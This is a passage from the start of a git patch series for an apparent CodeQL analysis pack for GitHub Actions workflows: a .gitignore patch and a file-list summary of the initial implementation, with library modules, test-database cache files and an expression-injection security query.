From 70a7bb1f7566447d73ff56d3c27b4d6913cf984b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 5 Feb 2024 09:25:33 +0100
Subject: [PATCH 0001/1267] Add .gitignore
---
.gitignore | 1 +
1 file changed, 1 insertion(+)
create mode 100644 .gitignore
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 00000000000..e43b0f98895
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+.DS_Store
From 45d959d13fb981ce2f8dc9e2396a5401321cb8a0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 09:26:11 +0100 Subject: [PATCH 0002/1267] Initial implementation --- build-dbs.sh | 5 + codeql-workspace.yml | 3 + ql/lib/actions.qll | 1 + ql/lib/codeql-pack.lock.yml | 16 + ql/lib/codeql/Locations.qll | 71 +++ ql/lib/codeql/actions/Ast.qll | 256 ++++++++++ ql/lib/codeql/actions/Cfg.qll | 7 + ql/lib/codeql/actions/DataFlow.qll | 10 + ql/lib/codeql/actions/TaintTracking.qll | 10 + .../codeql/actions/ast/internal/Actions.qll | 400 ++++++++++++++++ ql/lib/codeql/actions/ast/internal/Yaml.qll | 50 ++ .../actions/controlflow/BasicBlocks.qll | 445 ++++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 169 +++++++ .../codeql/actions/dataflow/FlowSources.qll | 137 ++++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 31 ++ .../internal/DataFlowImplSpecific.qll | 11 + .../dataflow/internal/DataFlowPrivate.qll | 312 ++++++++++++ .../dataflow/internal/DataFlowPublic.qll | 78 +++ .../internal/TaintTrackingImplSpecific.qll | 11 + .../internal/TaintTrackingPrivate.qll | 30 ++ .../actions/ideContextual/IDEContextual.qll | 19 + .../codeql/actions/ideContextual/printAst.qll | 137 ++++++ ql/lib/codeql/files/FileSystem.qll | 177 +++++++ .../codeql-database.yml | 39 ++ ql/lib/ide-contextual-queries/printAst.ql | 29 ++ ql/lib/ide-contextual-queries/printCfg.ql | 53 +++ ql/lib/qlpack.gbo | 13 + ql/lib/qlpack.yml | 15 + ql/lib/test-db/baseline-info.json | 1 + ql/lib/test-db/codeql-database.yml | 10 + ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 
40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 24 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 32 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 24 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 1080 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 544 bytes .../db-yaml/default/cache/pages/01.pack | Bin 0 -> 118 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/15.pack | Bin 0 -> 131 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/34.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 0 -> 865 bytes .../db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes 
.../db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 163 bytes .../db-yaml/default/cache/pages/43.pack | Bin 0 -> 368 bytes .../db-yaml/default/cache/pages/54.pack | Bin 0 -> 229 bytes .../db-yaml/default/cache/pages/55.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 0 -> 140 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 0 -> 1086 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/b4.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 0 -> 156 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 0 -> 282 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 0 -> 596 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 0 -> 115 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 136 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/53.pack | 
Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 140 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 148 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/relations/06.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/11.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 0 -> 177 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/39.pack | Bin 0 -> 272 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 0 -> 143 bytes 
.../db-yaml/default/cache/relations/9f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 0 -> 143 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 80 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 0 -> 8 bytes .../db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 0 -> 80 bytes .../db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/locations_default.rel | Bin 0 -> 1416 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes .../db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes .../db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes .../db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 
-> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 0 -> 1416 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/yaml_locations.rel | Bin 0 -> 472 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 552 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 +++++++++++ ...tabase-index-files-20240203.101755.239.log | 15 + ql/lib/test-db/src.zip | Bin 0 -> 578 bytes ql/lib/test/test.ql | 59 +++ ql/lib/test/test.yml | 36 ++ ql/lib/yaml.dbscheme | 80 ++++ ql/lib/yaml.dbscheme.stats | 4 + .../Security/CWE-094/ExpressionInjection.ql | 37 ++ ql/src/codeql-pack.lock.yml | 16 + .../codeql-suites/actions-code-scanning.qls | 0 ql/src/qlpack.yml | 14 + ql/src/test-db/baseline-info.json | 1 + ql/src/test-db/codeql-database.yml | 10 + ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 
41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 80 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 116 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 80 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 4776 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 0 -> 260 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 0 -> 68 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 0 -> 2392 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 0 -> 16 bytes 
...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 128 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes 
...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2392 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 0 -> 16 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 0 -> 2672 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/04.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 125 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 162 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 0 -> 316 bytes .../db-yaml/default/cache/pages/32.pack | Bin 0 -> 112 bytes .../db-yaml/default/cache/pages/46.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/4b.pack.d | Bin 0 -> 3805 bytes .../db-yaml/default/cache/pages/67.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 0 -> 664 bytes .../db-yaml/default/cache/pages/71.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 0 -> 618 bytes .../db-yaml/default/cache/pages/82.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 0 -> 354 bytes .../db-yaml/default/cache/pages/91.pack | Bin 0 -> 
112 bytes .../db-yaml/default/cache/pages/92.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 0 -> 2612 bytes .../db-yaml/default/cache/pages/95.pack | Bin 0 -> 124 bytes .../db-yaml/default/cache/pages/99.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 0 -> 1311 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 0 -> 149 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 797 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 0 -> 106 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 0 -> 119 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 0 -> 324 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 0 -> 173 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/de.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 0 -> 688 bytes .../db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 0 -> 117 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 339 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 537 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 0 -> 423 bytes 
.../db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 0 -> 211 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 0 -> 213 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 367 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 0 -> 223 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 0 -> 410 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 0 -> 411 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 0 -> 408 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 375 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 0 -> 204 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 0 -> 225 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 0 -> 418 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/83.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 341 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 336 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 0 -> 211 bytes 
.../db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 0 -> 219 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 0 -> 221 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 0 -> 215 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes .../db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/14.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/18.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/28.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 177 bytes 
.../db-yaml/default/cache/relations/39.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/47.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/59.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/80.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/85.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/cc.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d0.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d5.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/da.pack | Bin 0 -> 126 bytes ql/src/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 128 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/src/test-db/db-yaml/default/files.rel | 